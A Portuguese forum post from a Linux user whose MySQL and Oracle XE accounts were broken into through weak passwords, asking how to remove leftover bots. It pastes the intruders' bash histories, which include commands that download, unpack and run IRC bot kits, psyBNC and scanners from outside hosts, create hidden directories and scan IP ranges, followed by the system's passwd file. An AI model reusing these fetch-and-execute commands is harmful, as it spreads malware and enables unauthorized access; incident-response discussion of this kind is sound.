Salve! Ontem identifiquei um acesso não autorizado na minha máquina. Tenho instalado uma base Oracle Xe e também uma MySQL para testes aqui e acabei deixando ambos usuários com as senhas respectivamente iguais aos logins. Uma olhada no histórico do bash de cada um :
MYSQL:
w
passwd
moaramamaita
w
passwd
uname -a
ps x
w
cat /proc/cpuinfo
cat /etc/hosts
/sbin/ifconfig|grep inet
cd /var/tmp
ls
mkdir " "
cd " "
mkdir ". "
cd ". "
wget 16
wget http://shockingsoft.uv.ro/stuffs/boti-linux.tar.gz
passwd
w
ps x
cd /var/tmp
ls
cd " "
cd ". "
name -a
uname -a
ls
tar zxvf boti-linux.tar.gz
rm -rf boti-linux.tar.gz
ls
cd bots
ls
chmod +x *
cd randfiles
chmod +x *
cd ..
ls
vi kswap.set
vi mech1.users
vi mech2.users
vi mech3.users
export PATH=:$PATH
inetd
cd ..
ls
wget trades.ws43.com/scan/unixcod.tar.gz
tar zxvf unixcod.tar.gz
rm -rf unixcod.tar.gz
ls
cd unixcod
ls
./unix 200.1
./unix 200.10
./unix 200.113
./unix 200.24
w
passwd
uname -a
ps x
ps -aux
w
cd /var/tmp
ls
cd kdecache-root
ls
cd kdecache-leandro
ls -a
cd .oracle
ls
ls -a
cd ..
rm -rf .oracle
cd " "
cd ". "
ls
cd bots
ls
export PATH=:$PATH
inetd
uname -a
w
passwd
passwd mysql
ps x
ls
cd /var/tmp
ls -a
cd .oracle
ls -a
cd ..
rm -rf .oracle
wget http://www.localhost.home.ro/httpd.tar.gz
wget http://shockingsoft.uv.ro/stuffs/psybnc-no-ssl-linux.tar.gz
tar zxvf psybnc-no-ssl-linux.tar.gz
rm -rf psybnc-no-ssl-linux.tar.gz
ls
uname -a
cd psybnc
ls
./psyport 2006
./psybnc
cat /proc/cpuinfo
cat /etc/hosts
/sbin/ifconfig|grep inet
w
ps x
cd /var/tmp
ls
cd psybnc
ls
./psybnc
ORACLE:
w
cat /proc/cpuinfo
ls -a
uname -a
cd /var/tmp
wget http://download.microsoft.com/download/1/b/c/1bc0b1a3-c839-4b36-8f3c-19847ba09299/MPSetup.exe
passwd
wget http://catalisef.php0h.com/Catali.tgz;tar zxvf Catali.tgz;rm -rf Catali.tgz;cd fast;./start 59
id
exit
w
cd /var/tmp
ls -a
uname -a
wget members.lycos.co.uk/gambits/s4.sh;chmod +x s4.sh;./s4.sh
ls -a
cd fast
./start 59
exit
Dei uma pesquisada pelos arquivos acima, dei uma olhada nos scripts, verifiquei os diretórios que eles criaram e acessaram e me parece que não causaram nenhum estrago ou utilizaram nenhuma falha de segurança. O MySQL rodou alguns bots de mirc, pelo que me parece, e o Oracle executou um port scan.
Alterei a senha de ambos e fico constantemente monitorando os usuários logados. Mas agora fiquei com a pulga atrás da orelha: Como elemino os bots e processos deixados por eles de forma completa? Dei uma olhada também no arquivo passwd e vi que existem uma penca de usuários que não sei pra que servem, mas não tenho certeza se são usuários do sistema.
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
dhcp:x:101:101::/nonexistent:/bin/false
syslog:x:102:102::/home/syslog:/bin/false
klog:x:103:103::/home/klog:/bin/false
cupsys:x:100:106::/home/cupsys:/bin/false
messagebus:x:104:107::/var/run/dbus:/bin/false
haldaemon:x:108:108:Hardware abstraction layer,,,:/var/run/hal:/bin/false
hplip:x:105:7:HPLIP system user,,,:/var/run/hplip:/bin/false
leandro:x:1000:1000:leandro,,,:/home/leandro:/bin/bash
sshd:x:107:65534::/var/run/sshd:/usr/sbin/nologin
ftp:x:109:65534::/home/ftp:/bin/false
proftpd:x:110:65534:,,,,:/var/run/proftpd:/bin/false
gdm:x:106:111:Gnome Display Manager,,,,:/var/lib/gdm:/bin/false
oracle:x:1003:1003:,,,,:/usr/lib/oracle/xe:/bin/bash
Utilizei o chrootkit, mas aparentemente está tudo normal, não acusou nada de mais. Alguém tem alguma sugestão sobre como fazer uma limpeza geral?
Tópico: Processos indesejados e usuários desconhecidos (Lida 1367 vezes)